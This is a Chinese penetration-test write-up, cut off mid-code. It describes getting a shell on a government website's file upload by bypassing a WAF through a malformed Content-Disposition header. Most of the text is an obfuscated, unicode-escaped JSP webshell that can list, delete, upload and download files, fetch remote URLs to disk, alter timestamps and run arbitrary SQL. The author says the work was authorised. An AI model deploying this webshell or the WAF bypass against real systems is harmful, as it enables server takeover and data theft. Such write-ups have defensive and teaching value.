作者:Tide_诺言
原文地址:https://www.jianshu.com/u/58a5f9e596a7
前言
很久没有整理实战文章了,恰好这周项目上有一个目标折腾两天时间,记录分享下其中的心路历程。(本次渗透过程均在目标授权下进行,请勿进行非法渗透行为。)
目标基本信息
某政务网站
服务器--windows
数据库--未知
中间件--Tomcat
开发语言--java
未使用CDN
存在waf--种类未知
Getshell过程
目标存在一处上传功能。
image.png
上传成功后返回取件码。
使用取件码进行信件查询。
点击附件为下载链接。
image.png
对下载链接进行测试,发现报错时泄漏了绝对路径。
进过几次尝试,成功访问到上传的图片。
继续对上传功能进行测试,waf对上传后缀名进行了白名单限制,未发现可以利用的后缀名。
根据以往的bypass经验,开始手撕waf。
后缀名校验绕过
经过尝试,当Content-Disposition字段修改为Content+Disposition时可以绕过waf。
内容校验绕过
直接上传免杀较强的冰蝎马。
未上传成功,看来存在文件内容校验,拿出自己的免杀马进行测试。
经过尝试免杀马全部阵亡,无一例外。
敲个helloword看看吧。
然而。。。
第一次碰到连helloword都拦的waf。
经过多次测试,waf对绝大部分的jsp函数都进行了拦截。
内容加密
首先想到的解决方案是对木马进行加密。
在网上查找相关的资料,发现LandGrey大佬的一个unicode编码的木马。
https://links.jianshu.com/go?to=https%3A%2F%2Fgithub.com%2FLandGrey%2Fwebshell-detect-bypass%2Ftree%2Fmaster%2Fwebshell%2Fjsp
<%@page import="java.io.*,java.net.*,java.sql.*,java.text.*"%><%!u0053u0074u0072u0069u006eu0067u0020u0050u0077u0064u003du0022u004cu0061u006eu0064u0047u0072u0065u0079u0022u003bu0053u0074u0072u0069u006eu0067u0020u0045u0043u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0020u0063u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0072u0065u0074u0075u0072u006eu0020u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u0028u0073u002eu0067u0065u0074u0042u0079u0074u0065u0073u0028u0022u0049u0053u004fu002du0038u0038u0035u0039u002du0031u0022u0029u002cu0063u0029u003bu007du0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0047u0043u0028u0053u0074u0072u0069u006eu0067u0020u0073u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0053u0074u0072u0069u006eu0067u005bu005du0020u0078u003du0073u002eu0074u0072u0069u006du0028u0029u002eu0073u0070u006cu0069u0074u0028u0022u005cu0072u005cu006eu0022u0029u003bu0043u006cu0061u0073u0073u002eu0066u006fu0072u004eu0061u006du0065u0028u0078u005bu0030u005du002eu0074u0072u0069u006du0028u0029u0029u002eu006eu0065u0077u0049u006eu0073u0074u0061u006eu0063u0065u0028u0029u003bu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0063u003du0044u0072u0069u0076u0065u0072u004du0061u006eu0061u0067u0065u0072u002eu0067u0065u0074u0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0028u0078u005bu0031u005du002eu0074u0072u0069u006du0028u0029u0029u003bu0069u0066u0028u0078u002eu006cu0065u006eu0067u0074u0068u003eu0032u0029u007bu0063u002eu0073u0065u0074u0043u0061u0074u0061u006cu006fu0067u0028u0078u005bu0032u005du002eu0074u0072u0069u006du0028u0029u0029u003bu007du0072u0065u0074u0075u0072u006eu0020u0063u003bu007du0076u006fu0069u0064u0020u0041u0041u0028u0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u0072u005bu005du003du0046u0069u006cu0065u002eu006cu0069u0073u0074u0052u006fu006fu0074u0073u0028u0029u003bu0066u006fu0072u0028u0069u006eu0074u0020u0069u003du0030u003bu0069u003cu0072u002eu006cu0065u006eu0067u0074u0068u003bu0069u002bu002bu0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0072u005bu0069u005du002eu0074u006fu0053u0074u0072u0069u006eu0067u0028u0029u002eu0073u0075u0062u0073u0074u0072u0069u006eu0067u0028u0030u002cu0032u0029u0029u003bu007du007du0076u006fu0069u0064u0020u0042u0042u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u006fu0046u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u002cu006cu005bu005du003du006fu0046u002eu006cu0069u0073u0074u0046u0069u006cu0065u0073u0028u0029u003bu0053u0074u0072u0069u006eu0067u0020u0073u0054u002cu0020u0073u0051u002cu0073u0046u003du0022u0022u003bu006au0061u0076u0061u002eu0075u0074u0069u006cu002eu0044u0061u0074u0065u0020u0064u0074u003bu0053u0069u006du0070u006cu0065u0044u0061u0074u0065u0046u006fu0072u006du0061u0074u0020u0066u006du003du006eu0065u0077u0020u0053u0069u006du0070u006cu0065u0044u0061u0074u0065u0046u006fu0072u006du0061u0074u0028u0022u0079u0079u0079u0079u002du004du004du002du0064u0064u0020u0048u0048u003au006du006du003au0073u0073u0022u0029u003bu0066u006fu0072u0028u0069u006eu0074u0020u0069u003du0030u003bu0069u003cu006cu002eu006cu0065u006eu0067u0074u0068u003bu0069u002bu002bu0029u007bu0064u0074u003du006eu0065u0077u0020u006au0061u0076u0061u002eu0075u0074u0069u006cu002eu0044u0061u0074u0065u0028u006cu005bu0069u005du002eu006cu0061u0073u0074u004du006fu0064u0069u0066u0069u0065u0064u0028u0029u0029u003bu0073u0054u003du0066u006du002eu0066u006fu0072u006du0061u0074u0028u0064u0074u0029u003bu0073u0051u003du006cu005bu0069u005du002eu0063u0061u006eu0052u0065u0061u0064u0028u0029u003fu0022u0052u0022u003au0022u0022u003bu0073u0051u002bu003du006cu005bu0069u005du002eu0063u0061u006eu0057u0072u0069u0074u0065u0028u0029u003fu0022u0020u0057u0022u003au0022u0022u003bu0069u0066u0028u006cu005bu0069u005du002eu0069u0073u0044u0069u0072u0065u0063u0074u006fu0072u0079u0028u0029u0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u006cu005bu0069u005du002eu0067u0065u0074u004eu0061u006du0065u0028u0029u002bu0022u002fu005cu0074u0022u002bu0073u0054u002bu0022u005cu0074u0022u002bu006cu005bu0069u005du002eu006cu0065u006eu0067u0074u0068u0028u0029u002bu0022u005cu0074u0022u002bu0073u0051u002bu0022u005cu006eu0022u0029u003bu007du0065u006cu0073u0065u007bu0073u0046u002bu003du006cu005bu0069u005du002eu0067u0065u0074u004eu0061u006du0065u0028u0029u002bu0022u005cu0074u0022u002bu0073u0054u002bu0022u005cu0074u0022u002bu006cu005bu0069u005du002eu006cu0065u006eu0067u0074u0068u0028u0029u002bu0022u005cu0074u0022u002bu0073u0051u002bu0022u005cu006eu0022u003bu007du007du0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0073u0046u0029u003bu007du0076u006fu0069u0064u0020u0045u0045u0028u0053u0074u0072u0069u006eu0067u0020u0073u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u003bu0069u0066u0028u0066u002eu0069u0073u0044u0069u0072u0065u0063u0074u006fu0072u0079u0028u0029u0029u007bu0046u0069u006cu0065u0020u0078u005bu005du003du0066u002eu006cu0069u0073u0074u0046u0069u006cu0065u0073u0028u0029u003bu0066u006fu0072u0028u0069u006eu0074u0020u006bu003du0030u003bu006bu003cu0078u002eu006cu0065u006eu0067u0074u0068u003bu006bu002bu002bu0029u007bu0069u0066u0028u0021u0078u005bu006bu005du002eu0064u0065u006cu0065u0074u0065u0028u0029u0029u007bu0045u0045u0028u0078u005bu006bu005du002eu0067u0065u0074u0050u0061u0074u0068u0028u0029u0029u003bu007du007du007du0066u002eu0064u0065u006cu0065u0074u0065u0028u0029u003bu007du0076u006fu0069u0064u0020u0046u0046u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0048u0074u0074u0070u0053u0065u0072u0076u006cu0065u0074u0052u0065u0073u0070u006fu006eu0073u0065u0020u0072u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0069u006eu0074u0020u006eu003bu0062u0079u0074u0065u005bu005du0020u0062u003du006eu0065u0077u0020u0062u0079u0074u0065u005bu0035u0031u0032u005du003bu0072u002eu0072u0065u0073u0065u0074u0028u0029u003bu0053u0065u0072u0076u006cu0065u0074u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0020u006fu0073u003du0072u002eu0067u0065u0074u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu0042u0075u0066u0066u0065u0072u0065u0064u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u0073u003du006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u006eu0065u0077u0020u0046u0069u006cu0065u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0073u0029u0029u003bu006fu0073u002eu0077u0072u0069u0074u0065u0028u0028u0022u0058u0040u0059u0022u0029u002eu0067u0065u0074u0042u0079u0074u0065u0073u0028u0029u002cu0030u002cu0033u0029u003bu0077u0068u0069u006cu0065u0028u0028u006eu003du0069u0073u002eu0072u0065u0061u0064u0028u0062u002cu0030u002cu0035u0031u0032u0029u0029u0021u003du002du0031u0029u007bu006fu0073u002eu0077u0072u0069u0074u0065u0028u0062u002cu0030u002cu006eu0029u003bu007du006fu0073u002eu0077u0072u0069u0074u0065u0028u0028u0022u0058u0040u0059u0022u0029u002eu0067u0065u0074u0042u0079u0074u0065u0073u0028u0029u002cu0030u002cu0033u0029u003bu006fu0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu0069u0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0076u006fu0069u0064u0020u0047u0047u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0020u0053u0074u0072u0069u006eu0067u0020u0064u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0053u0074u0072u0069u006eu0067u0020u0068u003du0022u0030u0031u0032u0033u0034u0035u0036u0037u0038u0039u0041u0042u0043u0044u0045u0046u0022u003bu0069u006eu0074u0020u006eu003bu0046u0069u006cu0065u0020u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u003bu0066u002eu0063u0072u0065u0061u0074u0065u004eu0065u0077u0046u0069u006cu0065u0028u0029u003bu0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0020u006fu0073u003du006eu0065u0077u0020u0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0066u0029u003bu0066u006fu0072u0028u0069u006eu0074u0020u0069u003du0030u003bu0069u003cu0064u002eu006cu0065u006eu0067u0074u0068u0028u0029u003bu0069u002bu003du0032u0029u007bu006fu0073u002eu0077u0072u0069u0074u0065u0028u0028u0068u002eu0069u006eu0064u0065u0078u004fu0066u0028u0064u002eu0063u0068u0061u0072u0041u0074u0028u0069u0029u0029u003cu003cu0034u007cu0068u002eu0069u006eu0064u0065u0078u004fu0066u0028u0064u002eu0063u0068u0061u0072u0041u0074u0028u0069u002bu0031u0029u0029u0029u0029u003bu007du006fu0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0076u006fu0069u0064u0020u0048u0048u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0020u0064u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u0073u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u002cu0064u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0064u0029u003bu0069u0066u0028u0073u0066u002eu0069u0073u0044u0069u0072u0065u0063u0074u006fu0072u0079u0028u0029u0029u007bu0069u0066u0028u0021u0064u0066u002eu0065u0078u0069u0073u0074u0073u0028u0029u0029u007bu0064u0066u002eu006du006bu0064u0069u0072u0028u0029u003bu007du0046u0069u006cu0065u0020u007au005bu005du003du0073u0066u002eu006cu0069u0073u0074u0046u0069u006cu0065u0073u0028u0029u003bu0066u006fu0072u0028u0069u006eu0074u0020u006au003du0030u003bu006au003cu007au002eu006cu0065u006eu0067u0074u0068u003bu006au002bu002bu0029u007bu0048u0048u0028u0073u002bu0022u002fu0022u002bu007au005bu006au005du002eu0067u0065u0074u004eu0061u006du0065u0028u0029u002cu0064u002bu0022u002fu0022u002bu007au005bu006au005du002eu0067u0065u0074u004eu0061u006du0065u0028u0029u0029u003bu007du007du0065u006cu0073u0065u007bu0046u0069u006cu0065u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u0073u003du006eu0065u0077u0020u0046u0069u006cu0065u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0073u0066u0029u003bu0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0020u006fu0073u003du006eu0065u0077u0020u0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0064u0066u0029u003bu0069u006eu0074u0020u006eu003bu0062u0079u0074u0065u005bu005du0020u0062u003du006eu0065u0077u0020u0062u0079u0074u0065u005bu0035u0031u0032u005du003bu0077u0068u0069u006cu0065u0028u0028u006eu003du0069u0073u002eu0072u0065u0061u0064u0028u0062u002cu0030u002cu0035u0031u0032u0029u0029u0021u003du002du0031u0029u007bu006fu0073u002eu0077u0072u0069u0074u0065u0028u0062u002cu0030u002cu006eu0029u003bu007du0069u0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu006fu0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du007du0076u006fu0069u0064u0020u0049u0049u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0020u0064u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u0073u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u002cu0064u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0064u0029u003bu0073u0066u002eu0072u0065u006eu0061u006du0065u0054u006fu0028u0064u0066u0029u003bu007du0076u006fu0069u0064u0020u004au004au0028u0053u0074u0072u0069u006eu0067u0020u0073u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u003bu0066u002eu006du006bu0064u0069u0072u0028u0029u003bu007du0076u006fu0069u0064u0020u004bu004bu0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0020u0074u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0046u0069u006cu0065u0020u0066u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0073u0029u003bu0053u0069u006du0070u006cu0065u0044u0061u0074u0065u0046u006fu0072u006du0061u0074u0020u0066u006du003du006eu0065u0077u0020u0053u0069u006du0070u006cu0065u0044u0061u0074u0065u0046u006fu0072u006du0061u0074u0028u0022u0079u0079u0079u0079u002du004du004du002du0064u0064u0020u0048u0048u003au006du006du003au0073u0073u0022u0029u003bu006au0061u0076u0061u002eu0075u0074u0069u006cu002eu0044u0061u0074u0065u0020u0064u0074u003du0066u006du002eu0070u0061u0072u0073u0065u0028u0074u0029u003bu0066u002eu0073u0065u0074u004cu0061u0073u0074u004du006fu0064u0069u0066u0069u0065u0064u0028u0064u0074u002eu0067u0065u0074u0054u0069u006du0065u0028u0029u0029u003bu007du0076u006fu0069u0064u0020u004cu004cu0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0020u0053u0074u0072u0069u006eu0067u0020u0064u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0055u0052u004cu0020u0075u003du006eu0065u0077u0020u0055u0052u004cu0028u0073u0029u003bu0069u006eu0074u0020u006eu003bu0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0020u006fu0073u003du006eu0065u0077u0020u0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0064u0029u003bu0048u0074u0074u0070u0055u0052u004cu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0068u003du0028u0048u0074u0074u0070u0055u0052u004cu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0029u0075u002eu006fu0070u0065u006eu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0028u0029u003bu0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u0073u003du0068u002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu0062u0079u0074u0065u005bu005du0020u0062u003du006eu0065u0077u0020u0062u0079u0074u0065u005bu0035u0031u0032u005du003bu0077u0068u0069u006cu0065u0028u0028u006eu003du0069u0073u002eu0072u0065u0061u0064u0028u0062u002cu0030u002cu0035u0031u0032u0029u0029u0021u003du002du0031u0029u007bu006fu0073u002eu0077u0072u0069u0074u0065u0028u0062u002cu0030u002cu006eu0029u003bu007du006fu0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu0069u0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu0068u002eu0064u0069u0073u0063u006fu006eu006eu0065u0063u0074u0028u0029u003bu007du0076u006fu0069u0064u0020u004du004du0028u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u0073u002cu0020u0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0053u0074u0072u0069u006eu0067u0020u006cu003bu0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0072u003du006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u0069u0073u0029u0029u003bu0077u0068u0069u006cu0065u0028u0028u006cu003du0062u0072u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0021u003du006eu0075u006cu006cu0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u006cu002bu0022u005cu0072u005cu006eu0022u0029u003bu007du007du0076u006fu0069u0064u0020u004eu004eu0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0063u003du0047u0043u0028u0073u0029u003bu0052u0065u0073u0075u006cu0074u0053u0065u0074u0020u0072u003du0063u002eu0067u0065u0074u004du0065u0074u0061u0044u0061u0074u0061u0028u0029u002eu0067u0065u0074u0043u0061u0074u0061u006cu006fu0067u0073u0028u0029u003bu0077u0068u0069u006cu0065u0028u0072u002eu006eu0065u0078u0074u0028u0029u0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0072u002eu0067u0065u0074u0053u0074u0072u0069u006eu0067u0028u0031u0029u002bu0022u005cu0074u0022u0029u003bu007du0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu0063u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0076u006fu0069u0064u0020u004fu004fu0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0063u003du0047u0043u0028u0073u0029u003bu0053u0074u0072u0069u006eu0067u005bu005du0020u0074u003du007bu0022u0054u0041u0042u004cu0045u0022u007du003bu0052u0065u0073u0075u006cu0074u0053u0065u0074u0020u0072u003du0063u002eu0067u0065u0074u004du0065u0074u0061u0044u0061u0074u0061u0028u0029u002eu0067u0065u0074u0054u0061u0062u006cu0065u0073u0020u0028u006eu0075u006cu006cu002cu006eu0075u006cu006cu002cu0022u0025u0022u002cu0074u0029u003bu0077u0068u0069u006cu0065u0028u0072u002eu006eu0065u0078u0074u0028u0029u0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0072u002eu0067u0065u0074u0053u0074u0072u0069u006eu0067u0028u0022u0054u0041u0042u004cu0045u005fu004eu0041u004du0045u0022u0029u002bu0022u005cu0074u0022u0029u003bu007du0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu0063u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0076u006fu0069u0064u0020u0050u0050u0028u0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0053u0074u0072u0069u006eu0067u005bu005du0020u0078u003du0073u002eu0074u0072u0069u006du0028u0029u002eu0073u0070u006cu0069u0074u0028u0022u005cu0072u005cu006eu0022u0029u003bu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0063u003du0047u0043u0028u0073u0029u003bu0053u0074u0061u0074u0065u006du0065u006eu0074u0020u006du003du0063u002eu0063u0072u0065u0061u0074u0065u0053u0074u0061u0074u0065u006du0065u006eu0074u0028u0031u0030u0030u0035u002cu0031u0030u0030u0037u0029u003bu0052u0065u0073u0075u006cu0074u0053u0065u0074u0020u0072u003du006du002eu0065u0078u0065u0063u0075u0074u0065u0051u0075u0065u0072u0079u0028u0022u0073u0065u006cu0065u0063u0074u0020u002au0020u0066u0072u006fu006du0020u0022u002bu0078u005bu0033u005du0029u003bu0052u0065u0073u0075u006cu0074u0053u0065u0074u004du0065u0074u0061u0044u0061u0074u0061u0020u0064u003du0072u002eu0067u0065u0074u004du0065u0074u0061u0044u0061u0074u0061u0028u0029u003bu0066u006fu0072u0028u0069u006eu0074u0020u0069u003du0031u003bu0069u003cu003du0064u002eu0067u0065u0074u0043u006fu006cu0075u006du006eu0043u006fu0075u006eu0074u0028u0029u003bu0069u002bu002bu0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0064u002eu0067u0065u0074u0043u006fu006cu0075u006du006eu004eu0061u006du0065u0028u0069u0029u002bu0022u0020u0028u0022u002bu0064u002eu0067u0065u0074u0043u006fu006cu0075u006du006eu0054u0079u0070u0065u004eu0061u006du0065u0028u0069u0029u002bu0022u0029u005cu0074u0022u0029u003bu007du0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu006du002eu0063u006cu006fu0073u0065u0028u0029u003bu0063u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0076u006fu0069u0064u0020u0051u0051u0028u0053u0074u0072u0069u006eu0067u0020u0063u0073u002cu0053u0074u0072u0069u006eu0067u0020u0073u002cu0053u0074u0072u0069u006eu0067u0020u0071u002cu0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u0029u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu0069u006eu0074u0020u0069u003bu0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0020u0063u003du0047u0043u0028u0073u0029u003bu0053u0074u0061u0074u0065u006du0065u006eu0074u0020u006du003du0063u002eu0063u0072u0065u0061u0074u0065u0053u0074u0061u0074u0065u006du0065u006eu0074u0028u0031u0030u0030u0035u002cu0031u0030u0030u0038u0029u003bu0074u0072u0079u007bu0052u0065u0073u0075u006cu0074u0053u0065u0074u0020u0072u003du006du002eu0065u0078u0065u0063u0075u0074u0065u0051u0075u0065u0072u0079u0028u0071u0029u003bu0052u0065u0073u0075u006cu0074u0053u0065u0074u004du0065u0074u0061u0044u0061u0074u0061u0020u0064u003du0072u002eu0067u0065u0074u004du0065u0074u0061u0044u0061u0074u0061u0028u0029u003bu0069u006eu0074u0020u006eu003du0064u002eu0067u0065u0074u0043u006fu006cu0075u006du006eu0043u006fu0075u006eu0074u0028u0029u003bu0066u006fu0072u0028u0069u003du0031u003bu0069u003cu003du006eu003bu0069u002bu002bu0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0064u002eu0067u0065u0074u0043u006fu006cu0075u006du006eu004eu0061u006du0065u0028u0069u0029u002bu0022u005cu0074u007cu005cu0074u0022u0029u003bu007du0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u005cu0072u005cu006eu0022u0029u003bu0077u0068u0069u006cu0065u0028u0072u002eu006eu0065u0078u0074u0028u0029u0029u007bu0066u006fu0072u0028u0069u003du0031u003bu0069u003cu003du006eu003bu0069u002bu002bu0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0045u0043u0028u0072u002eu0067u0065u0074u0053u0074u0072u0069u006eu0067u0028u0069u0029u002cu0063u0073u0029u002bu0022u005cu0074u007cu005cu0074u0022u0029u003bu007du0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u005cu0072u005cu006eu0022u0029u003bu007du0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0063u0061u0074u0063u0068u0028u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0052u0065u0073u0075u006cu0074u005cu0074u007cu005cu0074u005cu0072u005cu006eu0022u0029u003bu0074u0072u0079u007bu006du002eu0065u0078u0065u0063u0075u0074u0065u0055u0070u0064u0061u0074u0065u0028u0071u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0045u0078u0065u0063u0075u0074u0065u0020u0053u0075u0063u0063u0065u0073u0073u0066u0075u006cu006cu0079u0021u005cu0074u007cu005cu0074u005cu0072u005cu006eu0022u0029u003bu007du0063u0061u0074u0063u0068u0028u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0065u0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0065u0065u002eu0074u006fu0053u0074u0072u0069u006eu0067u0028u0029u002bu0022u005cu0074u007cu005cu0074u005cu0072u005cu006eu0022u0029u003bu007du007du006du002eu0063u006cu006fu0073u0065u0028u0029u003bu0063u002eu0063u006cu006fu0073u0065u0028u0029u003bu007d%><%u0053u0074u0072u0069u006eu0067u0020u0063u0073u003du0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u007au0030u0022u0029u002bu0022u0022u003bu0072u0065u0071u0075u0065u0073u0074u002eu0073u0065u0074u0043u0068u0061u0072u0061u0063u0074u0065u0072u0045u006eu0063u006fu0064u0069u006eu0067u0028u0063u0073u0029u003bu0072u0065u0073u0070u006fu006eu0073u0065u002eu0073u0065u0074u0043u006fu006eu0074u0065u006eu0074u0054u0079u0070u0065u0028u0022u0074u0065u0078u0074u002fu0068u0074u006du006cu003bu0063u0068u0061u0072u0073u0065u0074u003du0022u002bu0063u0073u0029u003bu0053u0074u0072u0069u006eu0067u0020u005au003du0045u0043u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0050u0077u0064u0029u002bu0022u0022u002cu0063u0073u0029u003bu0053u0074u0072u0069u006eu0067u0020u007au0031u003du0045u0043u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u007au0031u0022u0029u002bu0022u0022u002cu0063u0073u0029u003bu0053u0074u0072u0069u006eu0067u0020u007au0032u003du0045u0043u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u007au0032u0022u0029u002bu0022u0022u002cu0063u0073u0029u003bu0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0020u0073u0062u003du006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u0042u0075u0066u0066u0065u0072u0028u0022u0022u0029u003bu0074u0072u0079u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0058u0040u0059u0022u0029u003bu0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0041u0022u0029u0029u007bu0053u0074u0072u0069u006eu0067u0020u0073u003du006eu0065u0077u0020u0046u0069u006cu0065u0028u0061u0070u0070u006cu0069u0063u0061u0074u0069u006fu006eu002eu0067u0065u0074u0052u0065u0061u006cu0050u0061u0074u0068u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0052u0065u0071u0075u0065u0073u0074u0055u0052u0049u0028u0029u0029u0029u002eu0067u0065u0074u0050u0061u0072u0065u006eu0074u0028u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0073u002bu0022u005cu0074u0022u0029u003bu0069u0066u0028